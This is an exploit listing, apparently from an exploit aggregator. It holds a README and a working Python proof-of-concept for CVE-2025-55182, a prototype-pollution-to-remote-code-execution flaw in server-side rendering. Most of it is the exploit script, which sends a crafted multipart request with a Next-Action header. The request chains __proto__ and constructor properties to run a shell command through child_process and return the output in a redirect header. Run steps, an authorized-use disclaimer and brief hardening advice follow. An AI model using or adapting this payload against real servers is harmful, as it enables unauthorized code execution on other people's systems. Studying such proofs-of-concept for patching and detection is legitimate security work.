## https://sploitus.com/exploit?id=22C6452A-F4D3-54B3-B016-2B265DDA20D5
# CVE-2025-55182 Proof-of-Concept
This repository contains a Proof-of-Concept (PoC) for **CVE-2025-55182**, a vulnerability involving **Prototype Pollution leading to Remote Code Execution (RCE)** in certain server‑side rendering implementations.
> ⚠️ **Warning:** This PoC is strictly for educational, research, and authorized security testing on personal or controlled environments. Unauthorized use on systems without permission is illegal.
---
## Vulnerability Overview
The vulnerability occurs when unvalidated user input is injected into internal JavaScript object structures (Prototype Pollution). When combined with specific execution flows, this can lead to **arbitrary code execution**.
In this PoC, chained properties such as `__proto__` and `constructor` are used to escalate the pollution into an execution context.
---
## Proof-of-Concept
Below is the `exploit.py` showcasing how the vulnerability can be exploited:
```python
import requests
import json
url = "http://localhost:3000"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
}
prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"
files = {
"0": (
None,
json.dumps({
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then":"$B1337"}',
"_response": {
"_prefix": prefix,
"_formData": {"get": "$1:constructor:constructor"}
}
}),
"application/json",
),
"1": (None, "\"$@0\""),
}
response = requests.post(url, headers=headers, files=files)
print("Headers:", response.headers.get('x-action-redirect'))
```
---
## How to Run
```bash
python3 exploit.py
```
Ensure you run this against a **local or development environment only**.
---
## Patch Status
If this vulnerability affects a real‑world project, check for and install the latest security patches released by the maintainers.
---
## Security Recommendations
- Regularly run npm audit and apply npm audit fix to keep dependencies secure
- Validate and sanitize all user input
- Prevent access to internal JavaScript object prototypes
- Use SSR sandbox isolation where possible
- Restrict or disable `child_process` execution in production
---
## License
MIT License